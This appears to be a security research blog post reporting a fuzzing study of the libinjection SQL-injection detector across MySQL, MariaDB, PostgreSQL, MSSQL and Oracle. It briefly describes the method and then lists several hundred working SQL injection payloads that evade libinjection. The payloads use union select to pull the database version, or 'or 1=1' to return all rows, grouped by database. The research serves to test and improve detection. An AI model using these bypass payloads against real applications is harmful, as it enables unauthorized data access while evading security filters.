Part 2. libinjection: different databases fuzzing

36 min read
Part 2. libinjection: different databases fuzzing

It is sequel of previous article, where I was fuzzing MariaDB 10.2.5, trying to bypass libinjection library.
This time the goal was to check, how libinjection bypasses depend on database used: which are common for several DB-engines and which are specific to single solution.

Environment deploy

For tests were choosen:

  • MySQL 5.7.19
  • MariaDB 10.2.5
  • PostgreSQL 9.6.4
  • Microsoft SQL Server 2016 (SP1)
  • Oracle 12c 12.1.0.2.0

All databases were deployed with default configuration without any security or performance tuning.

Also I've made small changes to mysql-fuzzer script to make it work with different database engines.

Fuzzing process

Fuzzing itself uses same approach: set query, payload and characters to fuzz.
I used two queries: with quotes (select * from users where id='1{payload}') and without quotes (select * from users where id=1{payload}). Then I've decided which parts of payloads could be fuzzed:

 {{}|+ {}|or {}|or {}=1} union select {{}|1|'a'|null|version()},version() -- 1
 {{}|+ {}|or {}| or {}=1} or 1=1 -- 1
' ({}|+ {}|or {}|or {}=1) union select {{}|1|'a'|null|version()},version() -- 1
' {{}|+ {}|or {}| or {}=1} or 1=1 -- 1

Depending on database union select payload was changed to get valid results, e.g.:

  • ' union select 1,version() -- 1 for PostgreSQL, MySQL and MariaDB
  • ' union select 1,@@VERSION -- 1 for MSSQL
  • ' union select 1,banner from v$version where rownum=1 -- 1 for Oracle

As fuzzed parameter were used 1-4 chars from this list " #$%&()*+,-./1:;<=>?@[\]^_`a{|}~!.

The payload was considered as working if database version was retrieved for union select and all three records for or 1=1 queries. If payload was not detected by libinjection as attack - it was considered as bypass.

Long story short, there was found 518 unique bypasses (474 new since previous article):

  • MySQL: 359
  • MariaDB: 337
  • MSSQL: 157
  • Oracle: 58
  • PostgreSQL: 18

All databases: MSSQL, MariaDB, MySQL, Oracle, PostgreSQL

  • soo1U
MSSQL: select * from users where id='1' + $+%1 union select 1,@@VERSION -- 1'
MariaDB: select * from users where id='1' <@&1 union select 1,version() -- 1'
MySQL: select * from users where id='1' %!<1 union select 1,version() -- 1'
Oracle: select * from users where id='1' | |1 union select 1,banner from v$version where rownum=1 -- 1'
PostgreSQL: select * from users where id='1' ! %1 union select 1,version() -- 1'

MSSQL, MariaDB, MySQL, Oracle

  • soo1&
MSSQL: select * from users where id='1' + $+%1 or 1=1 -- 1'
MariaDB: select * from users where id='1' <@&1 or 1=1 -- 1'
MySQL: select * from users where id='1' %!<1 or 1=1 -- 1'
Oracle: select * from users where id='1' | |1 or 1=1 -- 1'
  • .&1c
MSSQL: select * from users where id=1 +\. or 1=1 -- 1
MariaDB: select * from users where id=1. or 1=1 -- 1
MySQL: select * from users where id=1. or 1=1 -- 1
Oracle: select * from users where id=1. or 1=1 -- 1
  • &1c
MSSQL: select * from users where id=1   or 1=1 -- 1
MariaDB: select * from users where id=1 ||1# union select 1,version() -- 1
MySQL: select * from users where id=1 ||1# union select 1,version() -- 1
Oracle: select * from users where id=1   or 1=1 -- 1
  • .o1UE
MSSQL: select * from users where id=1.%1 union select null,@@VERSION -- 1
MariaDB: select * from users where id=1.&1 union select 1,version() -- 1
MySQL: select * from users where id=1.%1 union select 1,version() -- 1
Oracle: select * from users where id=1.*1 union select 1,banner from v$version where rownum=1 -- 1
  • sns
MSSQL: select * from users_chr where id=1 *\ union select 'a',@@VERSION -- 1
MariaDB: select * from users where id='1' union select "$"a,version() -- 1'
MySQL: select * from users where id='1' union select "$"_,version() -- 1'
Oracle: select * from users where id=1 union select 1"$",banner from v$version where rownum=1 -- 1
  • o1&1c
MSSQL: select * from users where id=1 %1 or 1=1 -- 1
MariaDB: select * from users where id=1 &1 or 1=1 -- 1
MySQL: select * from users where id=1 %1 or 1=1 -- 1
Oracle: select * from users where id=1 *1 or 1=1 -- 1
  • o(1)&
MSSQL: select * from users where id=1 %(1) or 1=1 -- 1
MariaDB: select * from users where id=1 &(1) or 1=1 -- 1
MySQL: select * from users where id=1 %(1) or 1=1 -- 1
Oracle: select * from users where id=1 *(1) or 1=1 -- 1
  • .o1&1
MSSQL: select * from users where id=1.%1 or 1=1 -- 1
MariaDB: select * from users where id=1.&1 or 1=1 -- 1
MySQL: select * from users where id=1.%1 or 1=1 -- 1
Oracle: select * from users where id=1.*1 or 1=1 -- 1
  • &1oo1
MSSQL: select * from users where id=1 or \+<1 union select 1,@@VERSION -- 1
MariaDB: select * from users where id=1 or  1<@=1 union select 1,version() -- 1
MySQL: select * from users where id=1 or 1<@=1 union select 1,version() -- 1
Oracle: select * from users where id=1 or 1^=1 union select 1,banner from v$version where rownum=1 -- 1

MSSQL, MariaDB, MySQL, PostgreSQL

  • s&1oU
MSSQL: select * from users where id='1' or 1<\ union select 1,@@VERSION -- 1'
MariaDB: select * from users where id='1' or  1<@ union select 1,version() -- 1'
MySQL: select * from users where id='1' or 1<@ union select 1,version() -- 1'
PostgreSQL: select * from users where id='1' or 1<1! union select 1,version() -- 1'
  • soUEv
MSSQL: select * from users where id='1' *\ union select null,@@VERSION -- 1'
MariaDB: select * from users where id='1'  <@ union select null,version() -- 1'
MySQL: select * from users where id='1' <@ union select null,version() -- 1'
PostgreSQL: select * from users where id='1' ! union select null,version() -- 1'
  • soUE1
MSSQL: select * from users where id='1' *\ union select 1,@@VERSION -- 1'
MariaDB: select * from users where id='1'  <@ union select 1,version() -- 1'
MySQL: select * from users where id='1' <@ union select 1,version() -- 1'
PostgreSQL: select * from users where id='1' ! union select 1,version() -- 1'

MariaDB, MySQL, Oracle, PostgreSQL

  • sc
MariaDB: select * from users where id='1' union select "#"a,version() -- 1'
MySQL: select * from users where id='1' union select "#"_,version() -- 1'
Oracle: select * from users where id=1 union select 1"#",banner from v$version where rownum=1 -- 1
PostgreSQL: select * from users where id='1' #1! union select 1,version() -- 1'

MSSQL, MariaDB, MySQL

  • so.UE
MSSQL: select * from users where id='1' + \. union select 1,@@VERSION -- 1'
MariaDB: select * from users where id='1'  <@. union select 1,version() -- 1'
MySQL: select * from users where id='1' <@. union select 1,version() -- 1'
  • .onUE
MSSQL: select * from users where id=1.*$ union select null,@@VERSION -- 1
MariaDB: select * from users where id=1.<@_ union select 1,version() -- 1
MySQL: select * from users where id=1.<@$ union select 1,version() -- 1
  • soo&1
MSSQL: select * from users where id='1' + $+%\ or 1=1 -- 1'
MariaDB: select * from users where id='1' <@<@ or 1=1 -- 1'
MySQL: select * from users where id='1' <@<@ or 1=1 -- 1'
  • 1o.UE
MSSQL: select * from users where id=1 +\+. union select null,@@VERSION -- 1
MariaDB: select * from users where id=1 + 1<@. union select 1,version() -- 1
MySQL: select * from users where id=11<@. union select 1,version() -- 1
  • &1o&1
MSSQL: select * from users where id=1 or 1<\ or 1=1 -- 1
MariaDB: select * from users where id=1 or  1<@ or 1=1 -- 1
MySQL: select * from users where id=1 or 1<@ or 1=1 -- 1
  • on&1c
MSSQL: select * from users where id=1 %$ or 1=1 -- 1
MariaDB: select * from users where id=1 <@_ or 1=1 -- 1
MySQL: select * from users where id=1 <@$ or 1=1 -- 1
  • s&1o&
MSSQL: select * from users where id='1' or 1<\ or 1=1 -- 1'
MariaDB: select * from users where id='1' or  1<@ or 1=1 -- 1'
MySQL: select * from users where id='1' or 1<@ or 1=1 -- 1'
  • s&1o.
MSSQL: select * from users where id='1' or 1<\. union select 1,@@VERSION -- 1'
MariaDB: select * from users where id='1' or 1<@. union select 1,version() -- 1'
MySQL: select * from users where id='1' or 1<@. union select 1,version() -- 1'
  • o&1c
MSSQL: select * from users where id=1 %\ or 1=1 -- 1
MariaDB: select * from users where id=1 <@ or 1=1 -- 1
MySQL: select * from users where id=1 <@ or 1=1 -- 1
  • 1oUEv
MSSQL: select * from users where id=1 +\+ union select null,@@VERSION -- 1
MariaDB: select * from users where id=1 -1<@ union select null,version() -- 1
MySQL: select * from users where id=1 +1<@ union select null,version() -- 1
  • soUEs
MSSQL: select * from users_chr where id='1' *\ union select 'a',@@VERSION -- 1'
MariaDB: select * from users where id='1'  <@ union select 'a',version() -- 1'
MySQL: select * from users where id='1' <@ union select 'a',version() -- 1'
  • .on&1
MSSQL: select * from users where id=1.%$ or 1=1 -- 1
MariaDB: select * from users where id=1.<@_ or 1=1 -- 1
MySQL: select * from users where id=1.<@$ or 1=1 -- 1
  • o.&1c
MSSQL: select * from users where id=1 %\. or 1=1 -- 1
MariaDB: select * from users where id=1  <@. or 1=1 -- 1
MySQL: select * from users where id=1 <@. or 1=1 -- 1
  • &1o.U
MSSQL: select * from users where id=1 or 1<\. union select 1,@@VERSION -- 1
MariaDB: select * from users where id=1 or 1<@. union select null,version() -- 1
MySQL: select * from users where id=1 or 1<@. union select 1,version() -- 1
  • .oUEv
MSSQL: select * from users where id=1.*\ union select null,@@VERSION -- 1
MariaDB: select * from users where id=1. <@ union select null,version() -- 1
MySQL: select * from users where id=1.<@ union select null,version() -- 1
  • .o.UE
MSSQL: select * from users where id=1.*\. union select null,@@VERSION -- 1
MariaDB: select * from users where id=1.<@. union select null,version() -- 1
MySQL: select * from users where id=1.<@. union select 1,version() -- 1
  • &1oUE
MSSQL: select * from users where id=1 or 1<\ union select 1,@@VERSION -- 1
MariaDB: select * from users where id=1 or  1<@ union select 1,version() -- 1
MySQL: select * from users where id=1 or 1<@ union select 1,version() -- 1
  • 1o&1c
MSSQL: select * from users where id=1 +\+ or 1=1 -- 1
MariaDB: select * from users where id=1 -1<@ or 1=1 -- 1
MySQL: select * from users where id=1 +1<@ or 1=1 -- 1
  • so&1c
MSSQL: select * from users where id='1' *\ or 1=1 -- 1'
MariaDB: select * from users where id='1'  <@ or 1=1 -- 1'
MySQL: select * from users where id='1' <@ or 1=1 -- 1'
  • o.UEv
MSSQL: select * from users where id=1 *\. union select null,@@VERSION -- 1
MariaDB: select * from users where id=1  <@. union select null,version() -- 1
MySQL: select * from users where id=1 <@. union select null,version() -- 1
  • so.&1
MSSQL: select * from users where id='1' *\. or 1=1 -- 1'
MariaDB: select * from users where id='1'  <@. or 1=1 -- 1'
MySQL: select * from users where id='1' <@. or 1=1 -- 1'
  • 1o.&1
MSSQL: select * from users where id=1 +\+. or 1=1 -- 1
MariaDB: select * from users where id=1 + 1<@. or 1=1 -- 1
MySQL: select * from users where id=11<@. or 1=1 -- 1
  • sooUE
MSSQL: select * from users where id='1' + $+*\ union select 1,@@VERSION -- 1'
MariaDB: select * from users where id='1' <@<@ union select 1,version() -- 1'
MySQL: select * from users where id='1' <@<@ union select 1,version() -- 1'
  • .o&1c
MSSQL: select * from users where id=1.%\ or 1=1 -- 1
MariaDB: select * from users where id=1. <@ or 1=1 -- 1
MySQL: select * from users where id=1.<@ or 1=1 -- 1

MSSQL, MySQL, PostgreSQL

  • s&o1U
MSSQL: select * from users where id='1' or \<1 union select 1,@@VERSION -- 1'
MySQL: select * from users where id='1' or !<1 union select 1,version() -- 1'
PostgreSQL: select * from users where id='1' or |/1=1 union select 1,version() -- 1'

MariaDB, MySQL, Oracle

  • s)s
MariaDB: select * from users where id='1' union select ")"a,version() -- 1'
MySQL: select * from users where id='1' union select ")"_,version() -- 1'
Oracle: select * from users where id=1 union select 1")",banner from v$version where rownum=1 -- 1
  • s.s
MariaDB: select * from users where id='1' union select "."a,version() -- 1'
MySQL: select * from users where id='1' union select "."_,version() -- 1'
Oracle: select * from users where id=1 union select 1".",banner from v$version where rownum=1 -- 1
  • s;s
MariaDB: select * from users where id='1' union select ";"a,version() -- 1'
MySQL: select * from users where id='1' union select ";"_,version() -- 1'
Oracle: select * from users where id=1 union select 1";",banner from v$version where rownum=1 -- 1
  • oo1UE
MariaDB: select * from users where id=1 <@&1 union select 1,version() -- 1
MySQL: select * from users where id=1 %!<1 union select 1,version() -- 1
Oracle: select * from users where id=1 | |1 union select 1,banner from v$version where rownum=1 -- 1
  • .&1UE
MariaDB: select * from users where id=1.||1 union select 1,version() -- 1
MySQL: select * from users where id=1.&&1 union select 1,version() -- 1
Oracle: select * from users where id=1.||1 union select 1,banner from v$version where rownum=1 -- 1
  • sv
MariaDB: select * from users where id='1' union select "@"a,version() -- 1'
MySQL: select * from users where id='1' union select "@"_,version() -- 1'
Oracle: select * from users where id=1 union select 1"@",banner from v$version where rownum=1 -- 1
  • sn
MariaDB: select * from users where id='1' union select "["_,version() -- 1'
MySQL: select * from users where id='1' union select "["_,version() -- 1'
Oracle: select * from users where id=1 union select 1"[",banner from v$version where rownum=1 -- 1
  • s?s
MariaDB: select * from users where id='1' union select "?"a,version() -- 1'
MySQL: select * from users where id='1' union select "?"_,version() -- 1'
Oracle: select * from users where id=1 union select 1"?",banner from v$version where rownum=1 -- 1
  • s{s
MariaDB: select * from users where id='1' union select "{"a,version() -- 1'
MySQL: select * from users where id='1' union select "{"_,version() -- 1'
Oracle: select * from users where id=1 union select 1"{",banner from v$version where rownum=1 -- 1
  • s(s
MariaDB: select * from users where id='1' union select "("a,version() -- 1'
MySQL: select * from users where id='1' union select "("_,version() -- 1'
Oracle: select * from users where id=1 union select 1"(",banner from v$version where rownum=1 -- 1
  • s:s
MariaDB: select * from users where id='1' union select ":"a,version() -- 1'
MySQL: select * from users where id='1' union select ":"_,version() -- 1'
Oracle: select * from users where id=1 union select 1":",banner from v$version where rownum=1 -- 1
  • oo1&1
MariaDB: select * from users where id=1 <@&1 or 1=1 -- 1
MySQL: select * from users where id=1 %!<1 or 1=1 -- 1
Oracle: select * from users where id=1 | |1 or 1=1 -- 1
  • s
MariaDB: select * from users where id='1' or ""<@ union select 1,version() -- 1'
MySQL: select * from users where id='1' union select ""_,version() -- 1'
Oracle: select * from users where id=1 union select 1" ",banner from v$version where rownum=1 -- 1
  • s1s
MariaDB: select * from users where id='1' union select "1"a,version() -- 1'
MySQL: select * from users where id='1' union select "1"_,version() -- 1'
Oracle: select * from users where id=1 union select 1"1",banner from v$version where rownum=1 -- 1
  • sos
MariaDB: select * from users where id='1'<@$$ union select 1,version() -- 1'
MySQL: select * from users where id='1' <@$$ union select 1,version() -- 1'
Oracle: select * from users where id=1 union select 1"!",banner from v$version where rownum=1 -- 1

MariaDB, MySQL, PostgreSQL

  • sUEv1
MariaDB: select * from users where id='1' union select  @ $,version() -- 1'
MySQL: select * from users where id='1' union select @ $,version() -- 1'
PostgreSQL: select * from users where id='1' union select @ 1,version() --  1'

MSSQL, MySQL

  • &o1&1
MSSQL: select * from users where id=1 or \<1 or 1=1 -- 1
MySQL: select * from users where id=1 or !<1 or 1=1 -- 1
  • &o1UE
MSSQL: select * from users where id=1 or \<1 union select 1,@@VERSION -- 1
MySQL: select * from users where id=1 or !<1 union select 1,version() -- 1
  • &1o.&
MSSQL: select * from users where id=1 or 1<\. or 1=1 -- 1
MySQL: select * from users where id=1 or 1<@. or 1=1 -- 1
  • .o.&1
MSSQL: select * from users where id=1.%\. or 1=1 -- 1
MySQL: select * from users where id=1.<@. or 1=1 -- 1
  • s&o1&
MSSQL: select * from users where id='1' or \<1 or 1=1 -- 1'
MySQL: select * from users where id='1' or !<1 or 1=1 -- 1'

MySQL, PostgreSQL

  • sUEo1
MySQL: select * from users where id='1' union select !<1,version() -- 1'
PostgreSQL: select * from users where id='1' union select |/1,version() --  1'

MariaDB, MySQL

sUE11: select * from users where id='1' union select .1$,version() -- 1'
s1(s: select * from users where id=1 or "1(" or 1=1 -- 1
voUE1: select * from users where id=1 +@<@ union select 1,version() -- 1
sn&1c: select * from users where id=1 or 1#"$ or 1=1 -- 1
s,:s: select * from users where id=1 or ",:" or 1=1 -- 1
s{{s: select * from users where id=1 or "{{" or 1=1 -- 1
s(UEf: select * from users where id=1 or 1#"( union select version(),version() -- 1
s.:s: select * from users where id=1 or ".:" or 1=1 -- 1
sn;s: select * from users where id=1 or "$;" or 1=1 -- 1
s(UEs: select * from users where id=1 or 1#"( union select 'a',version() -- 1
s(UEv: select * from users where id=1 or 1#"( union select null,version() -- 1
so.n&: select * from users where id='1' <@.$ or 1=1 -- 1'
so.nU: select * from users where id='1' <@.$ union select 1,version() -- 1'
sons: select * from users where id=1 or "%$" or 1=1 -- 1
voUEf: select * from users where id=1 +@<@ union select version(),version() -- 1
s.os: select * from users where id=1 or ".%" or 1=1 -- 1
o.UE1: select * from users where id=1 <@. union select 1,version() -- 1
s,,s: select * from users where id=1 or ",," or 1=1 -- 1
s{.s: select * from users where id=1 or "{." or 1=1 -- 1
.ov&1: select * from users where id=1.%@ or 1=1 -- 1
o.nUE: select * from users where id=1 <@.$ union select 1,version() -- 1
UE1&1: select * from users where id=1 union select 1&&1,version() -- 1
&v: select * from users where id=1 or @`\` union select 1,version() -- 1
so..U: select * from users where id='1' <@.. union select 1,version() -- 1'
sn{s: select * from users where id=1 or "${" or 1=1 -- 1
s.v: select * from users where id=1 or ".@" or 1=1 -- 1
so.s: select * from users where id=1 or "%." or 1=1 -- 1
s:os: select * from users where id=1 or ":%" or 1=1 -- 1
vo.UE: select * from users where id=1 + @<@. union select 1,version() -- 1
s?:s: select * from users where id=1 or "?:" or 1=1 -- 1
s1:s: select * from users where id=1 or "1:" or 1=1 -- 1
s{&1c: select * from users where id=1 or 1#"{ or 1=1 -- 1
s:1s: select * from users where id=1 or ":1" or 1=1 -- 1
s?&1c: select * from users where id=1 or 1#"? or 1=1 -- 1
UE1&v: select * from users where id=1 union select 1&&@,version() -- 1
s(os: select * from users where id=1 or "(%" or 1=1 -- 1
ooUEf: select * from users where id=1 <@<@ union select version(),version() -- 1
so1s: select * from users where id=1 or "%1" or 1=1 -- 1
sv;s: select * from users where id=1 or "@;" or 1=1 -- 1
s,os: select * from users where id=1 or ",%" or 1=1 -- 1
s\c: select * from users where id=1 or "\#" or 1=1 -- 1
s;c: select * from users where id=1 or ";#" or 1=1 -- 1
s;n: select * from users where id=1 or ";[" or 1=1 -- 1
s;v: select * from users where id=1 or ";@" or 1=1 -- 1
UEvo,: select * from users where id=1 union select @<@,version() -- 1
s;UEs: select * from users where id=1 or 1#"; union select 'a',version() -- 1
s;UEv: select * from users where id=1 or 1#"; union select null,version() -- 1
o..&1: select * from users where id=1 <@.. or 1=1 -- 1
oov&1: select * from users where id=1 %!<@ or 1=1 -- 1
s:?s: select * from users where id=1 or ":?" or 1=1 -- 1
s,(s: select * from users where id=1 or ",(" or 1=1 -- 1
s;UE1: select * from users where id=1 or 1#"; union select 1,version() -- 1
s)v: select * from users where id=1 or ")@" or 1=1 -- 1
v: select * from users where id=1 + @`\` union select 1,version() -- 1
s(1s: select * from users where id=1 or "(1" or 1=1 -- 1
s)n: select * from users where id=1 or ")[" or 1=1 -- 1
s):s: select * from users where id=1 or "):" or 1=1 -- 1
sn(s: select * from users where id=1 or "$(" or 1=1 -- 1
.UEf(: select * from users where id=1. union select version(),version() -- 1
s1: select * from users where id=1 or "1," or 1=1 -- 1
s(,s: select * from users where id=1 or "(," or 1=1 -- 1
UEv&v: select * from users where id=1 union select @&&@,version() -- 1
voUEv: select * from users where id=1 +@<@ union select null,version() -- 1
onnUE: select * from users where id=1 <@$_ union select 1,version() -- 1
snc: select * from users where id=1 or "$#" or 1=1 -- 1
snn: select * from users where id=1 or "$[" or 1=1 -- 1
s.&1c: select * from users where id=1 or 1#". or 1=1 -- 1
snv: select * from users where id=1 or "$@" or 1=1 -- 1
s)(s: select * from users where id=1 or ")(" or 1=1 -- 1
s??s: select * from users where id=1 or "??" or 1=1 -- 1
s?o1&: select * from users where id=1 or 1#"?=1 or 1=1 -- 1
s{?s: select * from users where id=1 or "{?" or 1=1 -- 1
s?(s: select * from users where id=1 or "?(" or 1=1 -- 1
UEv&1: select * from users where id=1 union select @&&1,version() -- 1
s?v: select * from users where id=1 or "?@" or 1=1 -- 1
soos: select * from users where id=1 or "%%" or 1=1 -- 1
s?c: select * from users where id=1 or "?#" or 1=1 -- 1
s.ns: select * from users where id=1 or ".$" or 1=1 -- 1
s;.s: select * from users where id=1 or ";." or 1=1 -- 1
s.o1U: select * from users where id=1 or 1#".=1 union select 1,version() -- 1
s?n: select * from users where id=1 or "?[" or 1=1 -- 1
s:.s: select * from users where id=1 or ":." or 1=1 -- 1
s;,s: select * from users where id=1 or ";," or 1=1 -- 1
s?{s: select * from users where id=1 or "?{" or 1=1 -- 1
s1{s: select * from users where id=1 or "1{" or 1=1 -- 1
s{c: select * from users where id=1 or "{#" or 1=1 -- 1
s.UEs: select * from users where id=1 or 1#". union select 'a',version() -- 1
s.UEv: select * from users where id=1 or 1#". union select null,version() -- 1
s1?s: select * from users where id=1 or "1?" or 1=1 -- 1
s{v: select * from users where id=1 or "{@" or 1=1 -- 1
sv(s: select * from users where id=1 or "@(" or 1=1 -- 1
s.UEf: select * from users where id=1 or 1#". union select version(),version() -- 1
o1nUE: select * from users where id=1 <@1$ union select 1,version() -- 1
s.o1&: select * from users where id=1 or 1#".=1 or 1=1 -- 1
oovUE: select * from users where id=1 %!<@ union select 1,version() -- 1
s{1s: select * from users where id=1 or "{1" or 1=1 -- 1
s;&1c: select * from users where id=1 or 1#"; or 1=1 -- 1
s(ns: select * from users where id=1 or "($" or 1=1 -- 1
sv:s: select * from users where id=1 or "@:" or 1=1 -- 1
&voo1: select * from users where id=1 or @<@=1 union select 1,version() -- 1
s(UE1: select * from users where id=1 or 1#"( union select 1,version() -- 1
s:&1c: select * from users where id=1 or 1#": or 1=1 -- 1
UEv1n: select * from users where id=1 union select @ 1_,version() -- 1
s),s: select * from users where id=1 or ")," or 1=1 -- 1
s1)s: select * from users where id=1 or "1)" or 1=1 -- 1
UEv1f: select * from users where id=1 union select @ $,version() -- 1
sn:s: select * from users where id=1 or "$:" or 1=1 -- 1
&vc: select * from users where id=1 or  @$#=1 union select 1,version() -- 1
s?,s: select * from users where id=1 or "?," or 1=1 -- 1
s:)s: select * from users where id=1 or ":)" or 1=1 -- 1
s)1s: select * from users where id=1 or ")1" or 1=1 -- 1
.UE1,: select * from users where id=1. union select 1,version() -- 1
soUEf: select * from users where id='1' <@ union select version(),version() -- 1'
s({s: select * from users where id=1 or "({" or 1=1 -- 1
1oUEf: select * from users where id=1 +1<@ union select version(),version() -- 1
s;(s: select * from users where id=1 or ";(" or 1=1 -- 1
s.c: select * from users where id=1 or ".#" or 1=1 -- 1
s(v: select * from users where id=1 or "(@" or 1=1 -- 1
s,&1c: select * from users where id=1 or 1#", or 1=1 -- 1
s.n: select * from users where id=1 or ".[" or 1=1 -- 1
1c: select * from users where id=11<1# union select 1,version() -- 1
s(c: select * from users where id=1 or "(#" or 1=1 -- 1
s(n: select * from users where id=1 or "([" or 1=1 -- 1
s:;s: select * from users where id=1 or ":;" or 1=1 -- 1
1oUE1: select * from users where id=1 +1<@ union select 1,version() -- 1
s..s: select * from users where id=1 or ".." or 1=1 -- 1
s:ns: select * from users where id=1 or ":$" or 1=1 -- 1
s;:s: select * from users where id=1 or ";:" or 1=1 -- 1
s?;s: select * from users where id=1 or "?;" or 1=1 -- 1
o.n&1: select * from users where id=1 <@.$ or 1=1 -- 1
s1;s: select * from users where id=1 or "1;" or 1=1 -- 1
s:{s: select * from users where id=1 or ":{" or 1=1 -- 1
snUEs: select * from users where id=1 or 1#"$ union select 'a',version() -- 1
snUEv: select * from users where id=1 or 1#"$ union select null,version() -- 1
snUEf: select * from users where id=1 or 1#"$ union select version(),version() -- 1
s?)s: select * from users where id=1 or "?)" or 1=1 -- 1
snos: select * from users where id=1 or "$%" or 1=1 -- 1
UE1s: select * from users where id=1 union select .1$$,version() -- 1
UE1n: select * from users where id=1 union select 1`\`,version() -- 1
UE1o,: select * from users where id=1 union select 1<@,version() -- 1
s(.s: select * from users where id=1 or "(." or 1=1 -- 1
s:n: select * from users where id=1 or ":[" or 1=1 -- 1
s:c: select * from users where id=1 or ":#" or 1=1 -- 1
snUE1: select * from users where id=1 or 1#"$ union select 1,version() -- 1
s:v: select * from users where id=1 or ":@" or 1=1 -- 1
s,.s: select * from users where id=1 or ",." or 1=1 -- 1
vo&1c: select * from users where id=1 +@<@ or 1=1 -- 1
o1c: select * from users where id=1 <1## union select 1,version() -- 1
s,o1&: select * from users where id=1 or 1#",=1 or 1=1 -- 1
s?o1U: select * from users where id=1 or 1#"?=1 union select 1,version() -- 1
soovU: select * from users where id='1' %!<@ union select 1,version() -- 1'
so(s: select * from users where id=1 or "%(" or 1=1 -- 1
.oUE1: select * from users where id=1.<@ union select 1,version() -- 1
s);s: select * from users where id=1 or ");" or 1=1 -- 1
s;?s: select * from users where id=1 or ";?" or 1=1 -- 1
s,c: select * from users where id=1 or ",#" or 1=1 -- 1
s.UE1: select * from users where id=1 or 1#". union select 1,version() -- 1
s(;s: select * from users where id=1 or "(;" or 1=1 -- 1
soov&: select * from users where id='1' %!<@ or 1=1 -- 1'
svos: select * from users where id=1 or "@%" or 1=1 -- 1
.oUEf: select * from users where id=1.<@ union select version(),version() -- 1
s,o1U: select * from users where id=1 or 1#",=1 union select 1,version() -- 1
so:s: select * from users where id=1 or "%:" or 1=1 -- 1
s{os: select * from users where id=1 or "{%" or 1=1 -- 1
s()s: select * from users where id=1 or "()" or 1=1 -- 1
s;o1&: select * from users where id=1 or 1#";=1 or 1=1 -- 1
s(o1U: select * from users where id=1 or 1#"(=1 union select 1,version() -- 1
s:(s: select * from users where id=1 or ":(" or 1=1 -- 1
s:UEv: select * from users where id=1 or 1#": union select null,version() -- 1
&(1)&: select * from users where id=1 or (1) or 1=1 -- 1
s;{s: select * from users where id=1 or ";{" or 1=1 -- 1
s{,s: select * from users where id=1 or "{," or 1=1 -- 1
s(&1c: select * from users where id=1 or 1#"( or 1=1 -- 1
s;o1U: select * from users where id=1 or 1#";=1 union select 1,version() -- 1
&voUE: select * from users where id=1 or @<@ union select 1,version() -- 1
s.)s: select * from users where id=1 or ".)" or 1=1 -- 1
s,{s: select * from users where id=1 or ",{" or 1=1 -- 1
so,s: select * from users where id=1 or "%," or 1=1 -- 1
ooUE1: select * from users where id=1 <@<@ union select 1,version() -- 1
s,UEv: select * from users where id=1 or 1#", union select null,version() -- 1
s?ns: select * from users where id=1 or "?$" or 1=1 -- 1
s,UEs: select * from users where id=1 or 1#", union select 'a',version() -- 1
s.{s: select * from users where id=1 or ".{" or 1=1 -- 1
o.UEf: select * from users where id=1 <@. union select version(),version() -- 1
s,UEf: select * from users where id=1 or 1#", union select version(),version() -- 1
s(?s: select * from users where id=1 or "(?" or 1=1 -- 1
s&vo&: select * from users where id='1' or @<@ or 1=1 -- 1'
s)?s: select * from users where id=1 or ")?" or 1=1 -- 1
o..UE: select * from users where id=1 <@.. union select 1,version() -- 1
s,?s: select * from users where id=1 or ",?" or 1=1 -- 1
s,UE1: select * from users where id=1 or 1#", union select 1,version() -- 1
ooUEv: select * from users where id=1 <@<@ union select null,version() -- 1
s;ns: select * from users where id=1 or ";$" or 1=1 -- 1
s){s: select * from users where id=1 or "){" or 1=1 -- 1
s.?s: select * from users where id=1 or ".?" or 1=1 -- 1
s(o1&: select * from users where id=1 or 1#"(=1 or 1=1 -- 1
.UEv,: select * from users where id=1. union select null,version() -- 1
onn&1: select * from users where id=1 <@$_ or 1=1 -- 1
UE1nn: select * from users where id=1 union select .1$_,version() -- 1
s:,s: select * from users where id=1 or ":," or 1=1 -- 1
&vo.U: select * from users where id=1 or @<@. union select 1,version() -- 1
s;)s: select * from users where id=1 or ";)" or 1=1 -- 1
s{(s: select * from users where id=1 or "{(" or 1=1 -- 1
so..&: select * from users where id='1' <@.. or 1=1 -- 1'
UE1n,: select * from users where id=1 union select .1_,version() -- 1
so{s: select * from users where id=1 or "%{" or 1=1 -- 1
s?1s: select * from users where id=1 or "?1" or 1=1 -- 1
s(:s: select * from users where id=1 or "(:" or 1=1 -- 1
s{UE1: select * from users where id=1 or 1#"{ union select 1,version() -- 1
s:UEs: select * from users where id=1 or 1#": union select 'a',version() -- 1
s;1s: select * from users where id=1 or ";1" or 1=1 -- 1
s:UEf: select * from users where id=1 or 1#": union select version(),version() -- 1
so;s: select * from users where id=1 or "%;" or 1=1 -- 1
sv&1c: select * from users where id=1 or 1#"@ or 1=1 -- 1
snns: select * from users where id=1 or "$_" or 1=1 -- 1
s,;s: select * from users where id=1 or ",;" or 1=1 -- 1
s{UEs: select * from users where id=1 or 1#"{ union select 'a',version() -- 1
s?.s: select * from users where id=1 or "?." or 1=1 -- 1
s{UEv: select * from users where id=1 or 1#"{ union select null,version() -- 1
s:UE1: select * from users where id=1 or 1#": union select 1,version() -- 1
s.;s: select * from users where id=1 or ".;" or 1=1 -- 1
&1ov&: select * from users where id=1 or 1%@ or 1=1 -- 1
s{UEf: select * from users where id=1 or 1#"{ union select version(),version() -- 1
svUE1: select * from users where id=1 or 1#"@ union select 1,version() -- 1
s1n: select * from users where id=1 or "1[" or 1=1 -- 1
s1c: select * from users where id=1 or "1#" or 1=1 -- 1
UEvnn: select * from users where id=1 union select @ $_,version() -- 1
UE11f: select * from users where id=1 union select .1$,version() -- 1
UE11n: select * from users where id=1 union select 1 1_,version() -- 1
svUEf: select * from users where id=1 or 1#"@ union select version(),version() -- 1
svUEs: select * from users where id=1 or 1#"@ union select 'a',version() -- 1
s{:s: select * from users where id=1 or "{:" or 1=1 -- 1
svUEv: select * from users where id=1 or 1#"@ union select null,version() -- 1
so)s: select * from users where id=1 or "%)" or 1=1 -- 1
UEvn,: select * from users where id=1 union select @ _,version() -- 1
s.(s: select * from users where id=1 or ".(" or 1=1 -- 1
s1&1c: select * from users where id=1 or 1#"1 or 1=1 -- 1
s.,s: select * from users where id=1 or ".," or 1=1 -- 1
os: select * from users where id=1 <@$$ union select 1,version() -- 1
soc: select * from users where id=1 or "%#" or 1=1 -- 1
sonnU: select * from users where id='1' <@$_ union select 1,version() -- 1'
son: select * from users where id=1 or "%[" or 1=1 -- 1
so?s: select * from users where id=1 or "%?" or 1=1 -- 1
s?UEv: select * from users where id=1 or 1#"? union select null,version() -- 1
